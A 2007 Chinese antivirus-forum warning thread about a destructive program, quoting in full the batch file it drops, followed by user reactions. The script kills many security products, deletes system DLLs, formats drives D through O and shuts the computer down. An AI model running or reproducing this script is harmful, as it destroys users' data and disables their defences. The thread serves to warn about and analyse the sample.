瑞星卡卡安全论坛

首页 » 技术交流区 » 反病毒/反流氓软件论坛 » 【警示】注意这只小蜗牛
baohe - 2007-5-17 18:10:00
会格盘的东东哦!
运行后,会格式化C盘以外的所有分区(D-O分区全格)。
它还更改系统时间,且通过taskkill灭掉多个安全软件。

以下是它运行后释放并运行的那个.bat文件的内容:
@shift 1
@echo off
set date=%date%
date 1987-09-30
date 1987-09-30
@echo.
@echo off & setlocal enableextensions
echo WScript.Sleep 1000 > %temp%.\tmp$$$.vbs
set /a i = 15
:Timeout
if %i% == 0 goto Next
setlocal
set /a i = %i% - 1
cscript //nologo %temp%.\tmp$$$.vbs
goto Timeout
goto End
:Next
@taskkill /f /im pfw.exe >nul
@taskkill /f /im shadowtip.exe >nul 
@taskkill /f /im shadowservice.exe >nul
@taskkill /f /im qq.exe >nul
@taskkill /f /im explorer.exe >nul
@taskkill /f /im IEXOLORE.EXE >nul
@taskkill /f /im norton* >nul
@taskkill /f /im av* >nul
@taskkill /f /im fire* >nul
@taskkill /f /im anti* >nul
@taskkill /f /im spy* >nul
@taskkill /f /im bullguard >nul
@taskkill /f /im PersFw >nul
@taskkill /f /im KAV* >nul
@taskkill /f /im ZONEALARM >nul
@taskkill /f /im SAFEWEB >nul
@taskkill /f /im OUTPOST >nul
@taskkill /f /im nv* >nul
@taskkill /f /im nav* >nul
@taskkill /f /im F-* >nul
@taskkill /f /im ESAFE >nul
@taskkill /f /im cle >nul
@taskkill /f /im BLACKICE >nul
@taskkill /f /im def* >nul
@taskkill /f /im 360safe.exe >nul
@taskkill /f /im explorer.exe
del C:\WINDOWS\system32\browselc.dll
del C:\WINDOWS\system32\browser.dll
del C:\WINDOWS\system32\browseui.dll
del C:\WINDOWS\system32\browsewm.dll
@format d:/y/q
@format e:/y/q
@format f:/y/q
@format g:/y/q
@format h:/y/q
@format i:/y/q
@format j:/y/q
@format k:/y/q
@format l:/y/q
@format m:/y/q
@format n:/y/q
@format o:/y/q
date 2007-05-17 
date %date%
RD /S /Q %systemroot%\temp\
shutdown -s -t 1
@echo.
exit


附件: 1558472007517180010.jpg
spiritfire - 2007-5-17 18:18:00
汗死啊! 貌似忠厚的一只………………
天月来了 - 2007-5-17 18:22:00
呵呵!!!

不知谁会倒霉运行这玩意。
孤独更可靠 - 2007-5-17 19:37:00
哈,后面还带了个电脑关机的命令

有点意思

格了好多盘啊
天月来了 - 2007-5-17 20:06:00
估计也没多少人会用到O盘以后吧。

所以做的人,就做这么多了。
西门吹牛 - 2007-5-17 20:13:00
不知道猫叔运行后是怎么恢复其它分区的?
天月来了 - 2007-5-17 20:17:00
他没在乎呗。

呵呵!!!!!!!!
jmbt - 2007-5-17 20:18:00
黑灯黑火 - 2007-5-17 20:41:00
好恶毒的批处理~~

另,版主:它突破影子了吗?

不应该那么容易的吧!(记得用icesword,强制结束影子的进程,都没起什么作用~~)
baohe - 2007-5-17 20:59:00
引用:
【西门吹牛的贴子】不知道猫叔运行后是怎么恢复其它分区的?
………………

要是真让它得逞了,那个.bat就看不到了(自毁)。
玩儿鹰,是不能让鹰啄瞎眼睛滴!
baohe - 2007-5-17 21:01:00
引用:
【黑灯黑火的贴子】好恶毒的批处理~~

另,版主:它突破影子了吗?

不应该那么容易的吧!(记得用icesword,强制结束影子的进程,都没起什么作用~~)
………………

就对影子的了解而言,此毒的作者是个菜鸟。
taskkill掉shadowtip.exe就行了?
leoncoolmoon - 2007-5-17 21:49:00
不知道哪个脑袋长包的,整这种程序玩。。。
网缘绝恋 - 2007-5-18 9:50:00
引用:
【leoncoolmoon的贴子】不知道哪个脑袋长包的,整这种程序玩。。。
………………

春天的小水竹 - 2007-5-18 10:19:00
额,看来喜欢格盘的朋友有机会找到福音了,不用在靠其他软件格盘了,点个蜗牛就能搞定,方便啊!呵呵!
1
查看完整版本: 【警示】注意这只小蜗牛
© 2000 - 2026 Rising Corp. Ltd.